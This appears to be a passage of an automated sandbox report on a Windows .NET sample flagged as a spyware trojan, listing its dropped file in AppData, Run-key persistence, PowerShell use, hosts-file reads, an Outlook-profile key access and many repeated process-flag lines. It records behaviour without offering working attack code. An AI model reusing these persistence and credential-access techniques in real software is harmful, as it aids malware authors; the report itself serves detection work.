          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/13@11/7
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: SC_0017384.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_01
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SC_0017384.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: SC_0017384.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SC_0017384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041AB65 pushad ; retf
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040DCD0 push ebp; retf
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041A5D7 push es; iretd
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00422DFB push dword ptr [DF27AEF3h]; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00401D80 push eax; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00406D88 pushfd ; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004055AA push esp; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041B612 push edi; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004116DF pushfd ; retf
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017BD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SC_0017384.exeFile created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\SC_0017384.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LvdnyvcvrJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run LvdnyvcvrJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess information set: NOOPENFILEERRORBOX
